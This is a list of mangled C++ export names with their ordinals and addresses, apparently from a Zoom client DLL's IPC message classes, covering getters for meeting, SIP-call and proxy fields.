              ?Get_JMAK@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAAV?$CStringT@_W@Cmm@@XZ30890x41a050
              ?Get_JMFLog@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ30900x419af0
              ?Get_JoinErrorCode@CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAEAAIXZ30910x40c930
              ?Get_JoinErrorMessage@CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAEAAV?$CStringT@D@Cmm@@XZ30920x417c00
              ?Get_JoinType@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAAV?$CStringT@_W@Cmm@@XZ30930x41a020
              ?Get_JsCallID@CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30940x40c930
              ?Get_JsCallID@CSBMBMessage_CCIVideoGetCurrentUserRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30950x40c930
              ?Get_JsCallID@CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30960x40c930
              ?Get_JsCallID@CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30970x40c930
              ?Get_JsCallID@CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30980x40c930
              ?Get_JsCallID@CSBMBMessage_CCIVideoGetUserListRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30990x40c930
              ?Get_JsCallID@CSBMBMessage_CCIVideoGetUserListResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ31000x40c930
              ?Get_JsCallid@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ31010x419b50
              ?Get_Json@CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ31020x40c930
              ?Get_Json@CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ31030x40c930
              ?Get_Json@CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ31040x40c930
              ?Get_JsonMsg@CSBMBMessage_CCIVideoChangeBtnStatusRequest@@QAEAAV?$CStringT@D@Cmm@@XZ31050x40c930
              ?Get_JsonValue@CSBMBMessage_UpdateCallSessionSummaryResponse@@QAEAAV?$CStringT@D@Cmm@@XZ31060x40c930
              ?Get_Key@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAEAAV?$CStringT@D@Cmm@@XZ31070x40c930
              ?Get_Key@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAEAAV?$CStringT@D@Cmm@@XZ31080x417570
              ?Get_Key@CSBMBMessage_LCPRecordOperate@@QAEAAV?$CStringT@_W@Cmm@@XZ31090x40c930
              ?Get_Key@CSBMBMessage_UpdateKeyValueInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ31100x40c930
              ?Get_LastName@CSBMBMessage_UserUpdateName@@QAEAAV?$CStringT@_W@Cmm@@XZ31110x417570
              ?Get_Leave@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ31120x418390
              ?Get_LineCallId@CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@QAEAAV?$CStringT@D@Cmm@@XZ31130x40c930
              ?Get_LineCallId@CSBMBMessage_UpdateRegisterServer@@QAEAAV?$CStringT@D@Cmm@@XZ31140x40c930
              ?Get_LineId@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEAAV?$CStringT@D@Cmm@@XZ31150x40c930
              ?Get_LiveSteamViewUrl@CSBMBMessage_ConfirmConfLeave@@QAEAAV?$CStringT@_W@Cmm@@XZ31160x419b20
              ?Get_LocalIP@CSBMBMessage_CheckNomadic911_Notification@@QAEAAV?$CStringT@D@Cmm@@XZ31170x417c00
              ?Get_Log@CSBMBMessage_UploadPbxRealTimeMonitorLog@@QAEAAV?$CStringT@D@Cmm@@XZ31180x40c930
              ?Get_MeetingID@CSBMBMessage_InviteBuddyToMeeting@@QAEAAV?$CStringT@_W@Cmm@@XZ31190x417570
              ?Get_MeetingID@CSBMBMessage_KeepAlive@@QAEAAV?$CStringT@_W@Cmm@@XZ31200x40c930
              ?Get_MeetingID@CSBMBMessage_NotifyCallCommand@@QAEAAV?$CStringT@_W@Cmm@@XZ31210x40c930
              ?Get_MeetingID@CSBMBMessage_NotifyConfPListChanged@@QAEAAV?$CStringT@_W@Cmm@@XZ31220x40c930
              ?Get_MeetingID@CSBMBMessage_NotifyConferenceStatus@@QAEAAV?$CStringT@_W@Cmm@@XZ31230x40c930
              ?Get_MeetingID@CSBMBMessage_NotifyInviteFBBuddy@@QAEAAV?$CStringT@_W@Cmm@@XZ31240x40c930
              ?Get_MeetingID@CSBMBMessage_NotifyStartLogin@@QAEAAV?$CStringT@_W@Cmm@@XZ31250x417570
              ?Get_MeetingID@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEAAV?$CStringT@_W@Cmm@@XZ31260x417f30
              ?Get_MeetingID@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEAAV?$CStringT@_W@Cmm@@XZ31270x40c930
              ?Get_MeetingNo@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAA_JXZ31280x40c930
              ?Get_MeetingNo@CSBMBMessage_NotifySaveChat@@QAEAA_JXZ31290x40c930
              ?Get_MeetingNo@CSBMBMessage_NotifyStartRecording@@QAEAA_JXZ31300x40c930
              ?Get_MeetingNum@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEAA_JXZ31310x418730
              ?Get_MeetingNum@CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAEAA_JXZ31320x418730
              ?Get_MeetingNum@CSBMBMessage_InviteBuddyToMeeting@@QAEAA_JXZ31330x417f30
              ?Get_MeetingNumber@CSBMBMessage_NotifyConferenceStatus@@QAEAA_JXZ31340x418730
              ?Get_MeetingNumber@CSBMBMessage_NotifyInviteFBBuddy@@QAEAA_JXZ31350x418390
              ?Get_MeetingNumber@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEAAV?$CStringT@_W@Cmm@@XZ31360x417570
              ?Get_MeetingNumber@CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAEAA_JXZ31370x418730
              ?Get_MeetingTopic@CSBMBMessage_NotifySaveChat@@QAEAAV?$CStringT@_W@Cmm@@XZ31380x418930
              ?Get_MeetingTopic@CSBMBMessage_NotifyStartRecording@@QAEAAV?$CStringT@_W@Cmm@@XZ31390x418930
              ?Get_MeetingTypes@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEAAHXZ31400x419ff0
              ?Get_MemberName@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEAAV?$CStringT@D@Cmm@@XZ31410x418390
              ?Get_MemberNumber@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEAAV?$CStringT@D@Cmm@@XZ31420x418ba0
              ?Get_MethodID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ31430x418390
              ?Get_MinClientVersion@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAAV?$CStringT@_W@Cmm@@XZ31440x419ff0
              ?Get_MsgID@CSBMBMessage_UploadFeedback@@QAEAAHXZ31450x40c930
              ?Get_MsgType@CSBMBMessage_NotifyMeetingCallResponse@@QAEAAIXZ31460x40c930
              ?Get_MyScreenName@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEAAV?$CStringT@_W@Cmm@@XZ31470x40c930
              ?Get_Name@CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ31480x40c930
              ?Get_Name@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ31490x417f30
              ?Get_Name@CSBMBMessage_NotifyPTCallPeer@@QAEAAV?$CStringT@_W@Cmm@@XZ31500x417570
              ?Get_Name@CSBMBMessage_UpdateFeatureToggle@@QAEAAV?$CStringT@D@Cmm@@XZ31510x40c930
              ?Get_NameSpace@CSBMBMessage_IPCSDK_SDKCmdNotify@@QAEAAV?$CStringT@D@Cmm@@XZ31520x40c930
              ?Get_NameSpace@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEAAV?$CStringT@D@Cmm@@XZ31530x40c930
              ?Get_NeedUserConfirm@CSBMBMessage_OperateAudioFacilityParam@@QAEAAHXZ31540x4190a0
              ?Get_NeedUserConfirm@CSBMBMessage_OperateChatFacilityParam@@QAEAAHXZ31550x418730
              ?Get_NeedUserConfirm@CSBMBMessage_OperateScreenShareFacilityParam@@QAEAAHXZ31560x418730
              ?Get_NeedUserConfirm@CSBMBMessage_OperateVideoFacilityParam@@QAEAAHXZ31570x418730
              ?Get_NetworkState@CSBMBMessage_NotifyNetworkSwitch@@QAEAAIXZ31580x40c930
              ?Get_NewCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEAAIXZ31590x417c00
              ?Get_NewHostCallid@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEAAV?$CStringT@D@Cmm@@XZ31600x418390
              ?Get_NotifyType@CSBMBMessage_OutlookMAPIEventChangeNotify@@QAEAAIXZ31610x40c930
              ?Get_OldCount@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEAAIXZ31620x40c930
              ?Get_OldHostCallid@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEAAV?$CStringT@D@Cmm@@XZ31630x417c00
              ?Get_OperateType@CSBMBMessage_OperateAudioFacilityParam@@QAEAAHXZ31640x418730
              ?Get_OperateType@CSBMBMessage_OperateChatFacilityParam@@QAEAAHXZ31650x417c00
              ?Get_OperateType@CSBMBMessage_OperateScreenShareFacilityParam@@QAEAAHXZ31660x417c00
              ?Get_OperateType@CSBMBMessage_OperateVideoFacilityParam@@QAEAAHXZ31670x417c00
              ?Get_OperationType@CSBMBMessage_LCPRecordOperate@@QAEAAHXZ31680x417f50
              ?Get_Options@CSBMBMessage_UploadFeedback@@QAEAA_JXZ31690x418930
              ?Get_P1@CSBMBMessage_AddClientLog@@QAEAAV?$CStringT@_W@Cmm@@XZ31700x417c00
              ?Get_P2@CSBMBMessage_AddClientLog@@QAEAAV?$CStringT@_W@Cmm@@XZ31710x418390
              ?Get_P3@CSBMBMessage_AddClientLog@@QAEAAV?$CStringT@_W@Cmm@@XZ31720x418ba0
              ?Get_P4@CSBMBMessage_AddClientLog@@QAEAAV?$CStringT@_W@Cmm@@XZ31730x418bd0
              ?Get_P5@CSBMBMessage_AddClientLog@@QAEAAV?$CStringT@_W@Cmm@@XZ31740x4198a0
              ?Get_PTNotified@CSBMBMessage_CCIVideoEndVideoNotify@@QAEAAHXZ31750x418730
              ?Get_PageImgPath@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAV?$CStringT@_W@Cmm@@XZ31760x419af0
              ?Get_PageIndexFinished@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAIXZ31770x419ac0
              ?Get_PageNumSuccess@CSBMBMessage_Doc2ImgConvertFinish@@QAEAAIXZ31780x418390
              ?Get_PageNumTotal@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAIXZ31790x418390
              ?Get_PageNumTotal@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEAAIXZ31800x418390
              ?Get_Param@CSBMBMessage_HeartBeatRequest@@QAEAAIXZ31810x40c930
              ?Get_Param@CSBMBMessage_NotifyAppEvent@@QAEAAV?$CStringT@_W@Cmm@@XZ31820x417c00
              ?Get_Param@CSBMBMessage_NotifyDeviceReady@@QAEAAV?$CStringT@_W@Cmm@@XZ31830x40c930
              ?Get_Param@CSBMBMessage_NotifyEndSetting@@QAEAAIXZ31840x40c930
              ?Get_Param@CSBMBMessage_NotifyJoinByMeetingNumber@@QAEAAIXZ31850x40c930
              ?Get_Param@CSBMBMessage_NotifyOpenDialPad@@QAEAAIXZ31860x40c930
              ?Get_Param@CSBMBMessage_NotifyStartSetting@@QAEAAIXZ31870x40c930
              ?Get_ParamID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ31880x418ba0
              ?Get_Parameter@CSBMBMessage_NotifyUpgradeAccount@@QAEAAV?$CStringT@_W@Cmm@@XZ31890x40c930
              ?Get_Password@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAAV?$CStringT@_W@Cmm@@XZ31900x418930
              ?Get_Password@CSBMBMessage_NotifyStartLogin@@QAEAAV?$CStringT@_W@Cmm@@XZ31910x417f30
              ?Get_Password@CSBMBMessage_NotifyUserInputProxyAuth@@QAEAAV?$CStringT@_W@Cmm@@XZ31920x41a740
              ?Get_Path@CSBMBMessage_NotifySaveChat@@QAEAAV?$CStringT@_W@Cmm@@XZ31930x418760
              ?Get_Path@CSBMBMessage_NotifyStartRecording@@QAEAAV?$CStringT@_W@Cmm@@XZ31940x418760
              ?Get_PeerDisplayName@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ31950x418bd0
              ?Get_PeerNumber@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ31960x418ba0
              ?Get_PeerURI@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ31970x418390
              ?Get_Permanent@CSBMBMessage_VTLSConfirm@@QAEAAHXZ31980x41bea0
              ?Get_PhoneNumber@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ31990x417570
              ?Get_PhoneNumber@CSBMBMessage_NotifyPTCallPeer@@QAEAAV?$CStringT@_W@Cmm@@XZ32000x40c930
              ?Get_PhoneNumber@CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAEAAV?$CStringT@D@Cmm@@XZ32010x417570
              ?Get_PhotoPath@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAEAAV?$CStringT@D@Cmm@@XZ32020x418ba0
              ?Get_PhotoPath@CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAEAAV?$CStringT@D@Cmm@@XZ32030x417570
              ?Get_PicPath@CSBMBMessage_UserUploadPicture@@QAEAAV?$CStringT@_W@Cmm@@XZ32040x40c930
              ?Get_PmiName@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEAAV?$CStringT@D@Cmm@@XZ32050x418760
              ?Get_Policies@CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAEAA_JXZ32060x418730
              ?Get_Port@CSBMBMessage_NotifyUserInputProxyAuth@@QAEAAIXZ32070x418390
              ?Get_Port@CSBMBMessage_PromptProxyAuth@@QAEAAIXZ32080x418390
              ?Get_PreviewUrl@CSBMBMessage_NotifyStartAppShare@@QAEAAV?$CStringT@_W@Cmm@@XZ32090x417570
              ?Get_ProcessID@CSBMBMessage_Assistant_Exit_Process@@QAEAAIXZ32100x40c930
              ?Get_ProcessID@CSBMBMessage_NotifyAssistantStart@@QAEAAIXZ32110x40c930
              ?Get_ProcessID@CSBMBMessage_NotifyAssistantStop@@QAEAAIXZ32120x40c930
              ?Get_ProcessID@CSBMBMessage_NotifyConfStart@@QAEAAIXZ32130x40c930
              ?Get_ProcessID@CSBMBMessage_NotifyConfStop@@QAEAAIXZ32140x40c930
              ?Get_ProcessID@CSBMBMessage_Notify_PT_Process_PID@@QAEAAIXZ32150x40c930
              ?Get_ProcessID@SBIPCMessage_Connect@@QAEAAIXZ32160x40c930
              ?Get_ProcessID@SBIPCMessage_ConnectResponse@@QAEAAIXZ32170x40c930
              ?Get_ProcessID@SBIPCMessage_DisConnect@@QAEAAIXZ32180x40c930
              ?Get_ProcessName@CSBMBMessage_NotifyAssistantStart@@QAEAAV?$CStringT@D@Cmm@@XZ32190x417c00
              ?Get_ProcessName@CSBMBMessage_NotifyAssistantStop@@QAEAAV?$CStringT@D@Cmm@@XZ32200x417c00
              ?Get_ProcessName@CSBMBMessage_NotifyConfStart@@QAEAAV?$CStringT@D@Cmm@@XZ32210x417c00
              ?Get_ProcessName@CSBMBMessage_NotifyConfStop@@QAEAAV?$CStringT@D@Cmm@@XZ32220x417c00
              ?Get_Protocol@CSBMBMessage_UpdateRegisterServer@@QAEAAHXZ32230x417f50
              ?Get_ProxyServer@CSBMBMessage_UpdateRegisterServer@@QAEAAV?$CStringT@D@Cmm@@XZ32240x417f30
              ?Get_Reason@CSBMBMessage_ConfirmConfLeave@@QAEAAV?$CStringT@_W@Cmm@@XZ32250x40c930
              ?Get_Reason@CSBMBMessage_NotifyActivateConf@@QAEAAV?$CStringT@_W@Cmm@@XZ32260x40c930
              ?Get_Reason@CSBMBMessage_NotifyAppActive@@QAEAAV?$CStringT@D@Cmm@@XZ32270x40c930
              ?Get_Reason@CSBMBMessage_NotifyAppInActive@@QAEAAV?$CStringT@D@Cmm@@XZ32280x40c930
              ?Get_Reason@CSBMBMessage_NotifyConfSelected@@QAEAAIXZ32290x40c930
              ?Get_Reason@CSBMBMessage_NotifyLeaveConf@@QAEAAV?$CStringT@_W@Cmm@@XZ32300x40c930
              ?Get_Reason@CSBMBMessage_NotifyStartLogin@@QAEAAV?$CStringT@_W@Cmm@@XZ32310x40c930
              ?Get_Reason@CSBMBMessage_TermConf@@QAEAAV?$CStringT@_W@Cmm@@XZ32320x40c930
              ?Get_ReasonCode@CSBMBMessage_CCIVideoEndVideoNotify@@QAEAAHXZ32330x417c00
              ?Get_ReasonCode@CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@QAEAAHXZ32340x417c00
              ?Get_RecordOption@CSBMBMessage_NotifyStartRecording@@QAEAAIXZ32350x41a020
              ?Get_RecordScreen@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAHXZ32360x417c00
              ?Get_RecordingState@CSBMBMessage_CCIVideoRecordingStateChangeNotify@@QAEAAHXZ32370x40c930
              ?Get_RecoveryCommand@CSBMBMessage_NotifyConfStart@@QAEAAV?$CStringT@D@Cmm@@XZ32380x418390
              ?Get_Registrar@CSBMBMessage_UpdateRegisterServer@@QAEAAV?$CStringT@D@Cmm@@XZ32390x417570
              ?Get_RemoteCapability@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEAA_JXZ32400x418bd0
              ?Get_RequestInfo@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEAAV?$CStringT@D@Cmm@@XZ32410x417f30
              ?Get_RequestInfo@CSBMBMessage_OutlookRequest@@QAEAAV?$CStringT@D@Cmm@@XZ32420x40c930
              ?Get_RequestInfo@CSBMBMessage_OutlookStartMeetingRequest@@QAEAAV?$CStringT@D@Cmm@@XZ32430x40c930
              ?Get_RespCode@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEAAHXZ32440x418390
              ?Get_RespDescription@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEAAV?$CStringT@D@Cmm@@XZ32450x419ac0
              ?Get_ResponseInfo@CSBMBMessage_IPCSDK_SDKCmdNotify@@QAEAAV?$CStringT@D@Cmm@@XZ32460x417f30
              ?Get_ResponseInfo@CSBMBMessage_OutlookResponse@@QAEAAV?$CStringT@D@Cmm@@XZ32470x40c930
              ?Get_ResponseInfo@CSBMBMessage_OutlookStartMeetingResponse@@QAEAAV?$CStringT@D@Cmm@@XZ32480x40c930
              ?Get_Result@CSBMBMessage_Assistant_Audio_Configure_Response@@QAEAAHXZ32490x40c930
              ?Get_Result@CSBMBMessage_Assistant_CEC_PowerOnResponse@@QAEAAHXZ32500x40c930
              ?Get_Result@CSBMBMessage_Assistant_CEC_StandByResponse@@QAEAAHXZ32510x40c930
              ?Get_Result@CSBMBMessage_Assistant_CEC_UnloadResponse@@QAEAAHXZ32520x40c930
              ?Get_Result@CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAEAAHXZ32530x40c930
              ?Get_Result@CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAEAAHXZ32540x40c930
              ?Get_Result@CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAEAAHXZ32550x418390
              ?Get_Result@CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAEAAHXZ32560x40c930
              ?Get_RetCode@CSBMBMessage_Doc2ImgCancelConvertResponse@@QAEAAHXZ32570x417570
              ?Get_RetCode@CSBMBMessage_Doc2ImgConvertFinish@@QAEAAHXZ32580x417570
              ?Get_RetCode@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAHXZ32590x417570
              ?Get_RetCode@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEAAHXZ32600x417570
              ?Get_SDKCmdNotify@CSBMBMessage_Client3rdSDK_SDKCmdNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ32610x417c00
              ?Get_SDKCmdRequest@CSBMBMessage_Client3rdSDK_SDKCmdRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ32620x417c00
              ?Get_SSOVanityUrl@CSBMBMessage_OpenLoginPanelForGuest@@QAEAAV?$CStringT@_W@Cmm@@XZ32630x40c930
              ?Get_SceneID@CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ32640x40c930
              ?Get_Section@CSBMBMessage_LCPRecordOperate@@QAEAAV?$CStringT@_W@Cmm@@XZ32650x417f30
              ?Get_Server@CSBMBMessage_NotifyUserInputProxyAuth@@QAEAAV?$CStringT@_W@Cmm@@XZ32660x417c00
              ?Get_Server@CSBMBMessage_PromptProxyAuth@@QAEAAV?$CStringT@_W@Cmm@@XZ32670x417c00
              ?Get_Service@CSBMBMessage_UpdateFeatureToggle@@QAEAAV?$CStringT@D@Cmm@@XZ32680x417570
              ?Get_SessionID@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ32690x418600
              ?Get_SessionName@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ32700x419b20
              ?Get_SignUpURL@CSBMBMessage_RealNameAuthInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ32710x417c00
              ?Get_SpecialInfo@CSBMessage_Assistant_AudioDeviceUpdateNotification@@QAEAAIXZ32720x417c00
              ?Get_SrcCallid@CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAEAAV?$CStringT@D@Cmm@@XZ32730x417c00
              ?Get_SrcLineCallId@CSBMBMessage_Assistant_LineCallMergedNotification@@QAEAAV?$CStringT@D@Cmm@@XZ32740x40c930
              ?Get_State@CSBMBMessage_Assistant_SIP_SuspendToResume@@QAEAAIXZ32750x40c930
              ?Get_State@CSBMBMessage_NotifyNetworkStateChanged@@QAEAAIXZ32760x40c930
              ?Get_Status@CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAEAAHXZ32770x417570
              ?Get_Status@CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@QAEAAHXZ32780x417570
              ?Get_Status@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEAAHXZ32790x417570
              ?Get_Status@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEAAHXZ32800x417570
              ?Get_Status@CSBMBMessage_Assistant_SIP_OnSIPServiceStatusChangedNotification@@QAEAAHXZ32810x40c930
              ?Get_Status@CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAEAAHXZ32820x418930
              ?Get_Status@CSBMBMessage_VDI_Plugin_Info@@QAEAAIXZ32830x40c930
              ?Get_StatusCode@CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAEAAHXZ32840x417570
              ?Get_StatusCode@CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@QAEAAHXZ32850x40c930
              ?Get_SubTab@CSBMBMessage_NotifyStartSetting@@QAEAAIXZ32860x418730
              ?Get_Subscribe@CSBMBMessage_GetPresence@@QAEAAHXZ32870x417570
              ?Get_Success@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAHXZ32880x40c930
              ?Get_Tab@CSBMBMessage_NotifyStartSetting@@QAEAAIXZ32890x417c00
              ?Get_TabOrder@CSBMBMessage_NotifyInviteFBBuddy@@QAEAAIXZ32900x418600
              ?Get_TheProxyType@CSBMBMessage_NotifyUserInputProxyAuth@@QAEAAIXZ32910x40c930
              ?Get_TheProxyType@CSBMBMessage_PromptProxyAuth@@QAEAAIXZ32920x40c930
              ?Get_TroubleCode@CSBMBMessage_VDI_Plugin_Info@@QAEAAIXZ32930x417c00
              ?Get_TroubleReason@CSBMBMessage_UploadExceptionMemoryLog@@QAEAAV?$CStringT@D@Cmm@@XZ32940x418390
              ?Get_TroubleTime@CSBMBMessage_UploadExceptionMemoryLog@@QAEAAV?$CStringT@D@Cmm@@XZ32950x417c00
              ?Get_TroubleType@CSBMBMessage_UploadExceptionMemoryLog@@QAEAAHXZ32960x40c930
              ?Get_Type@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEAAHXZ32970x40c930
              ?Get_Type@CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAEAAHXZ32980x417f50
              ?Get_Type@CSBMBMessage_CCIVideoSetVBRequest@@QAEAAHXZ32990x417570
              ?Get_Type@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEAAIXZ33000x417f50
              ?Get_Type@CSBMBMessage_VDI_DiagLog_Content@@QAEAAIXZ33010x40c930
              ?Get_UpdateType@CSBMBMessage_NotifyPTLoginInfo@@QAEAAIXZ33020x40c930
              ?Get_Url@CSBMBMessage_NotifyOpenUrlWithAuth@@QAEAAV?$CStringT@_W@Cmm@@XZ33030x40c930
              ?Get_UserID@CSBMBMessage_CCIVideoMuteAudioRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ33040x40c930
              ?Get_UserID@CSBMBMessage_CCIVideoRemoveUserRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ33050x40c930
              ?Get_UserID@CSBMBMessage_ChatWithBuddy@@QAEAAV?$CStringT@_W@Cmm@@XZ33060x40c930
              ?Get_UserID@CSBMBMessage_InviteBuddyToMeeting@@QAEAAV?$CStringT@_W@Cmm@@XZ33070x40c930
              ?Get_UserList@CSBMBMessage_GetPresence@@QAEAAV?$CStringT@D@Cmm@@XZ33080x40c930
              ?Get_UserList@CSBMBMessage_GetPresenceResponse@@QAEAAV?$CStringT@D@Cmm@@XZ33090x40c930
              ?Get_UserList@CSBMBMessage_SubscribePresenceExpire@@QAEAAV?$CStringT@D@Cmm@@XZ33100x40c930
              ?Get_UserName@CSBMBMessage_NotifyUserInputProxyAuth@@QAEAAV?$CStringT@_W@Cmm@@XZ33110x419ac0
              ?Get_Username@CSBMBMessage_StartCallOutInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ33120x417570
              ?Get_UsersJson@CSBMBMessage_CCIVideoGetUserListResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ33130x417570
              ?Get_UsersJson@CSBMBMessage_CCIVideoOnUserJoinNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ33140x40c930
              ?Get_UsersJson@CSBMBMessage_CCIVideoOnUserLeaveNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ33150x40c930
              ?Get_UsersJson@CSBMBMessage_CCIVideoOnUserUpdatedNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ33160x40c930
              ?Get_Value@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ33170x418bd0
              ?Get_Value@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAEAAV?$CStringT@D@Cmm@@XZ33180x417570
              ?Get_Value@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAEAAV?$CStringT@D@Cmm@@XZ33190x417f30
              ?Get_Value@CSBMBMessage_LCPRecordOperate@@QAEAAV?$CStringT@_W@Cmm@@XZ33200x417570
              ?Get_Value@CSBMBMessage_UpdateFeatureToggle@@QAEAAV?$CStringT@D@Cmm@@XZ33210x417f30
              ?Get_Value@CSBMBMessage_UpdateKeyValueInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ33220x417570
              ?Get_VanityID@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAAV?$CStringT@_W@Cmm@@XZ33230x418190
              ?Get_Vendor@CSBMBMessage_NotifyStartAppShare@@QAEAAV?$CStringT@_W@Cmm@@XZ33240x417f30
              ?Get_VendorUrl@CSBMBMessage_NotifyStartAppShare@@QAEAAV?$CStringT@_W@Cmm@@XZ33250x417f50
              ?Get_Version@CSBMBMessage_VDI_Plugin_Info@@QAEAAV?$CStringT@D@Cmm@@XZ33260x418730
              ?Get_WebClientLink@CSBMBMessage_NotifyJoinFailForForceUpdate@@QAEAAV?$CStringT@_W@Cmm@@XZ33270x418760
              ?Get_WindowId@CSBMBMessage_CCIVideoDestroyEmbedWindowRequest@@QAEAAV?$CStringT@D@Cmm@@XZ33280x40c930
              ?Get_WindowId@CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAEAAV?$CStringT@D@Cmm@@XZ33290x40c930
              ?Get_XMLInvitation@CSBMBMessage_NotifyInvitationSent@@QAEAAV?$CStringT@D@Cmm@@XZ33300x40c930
              ?Get_ZoomUserID@CSBMBMessage_NotifyPTAddContact@@QAEAAV?$CStringT@_W@Cmm@@XZ33310x40c930
              ?Get_accountToggle@CSBMBMessage_MeetingPAAPToggleEvent@@QAEAAHXZ33320x419ac0
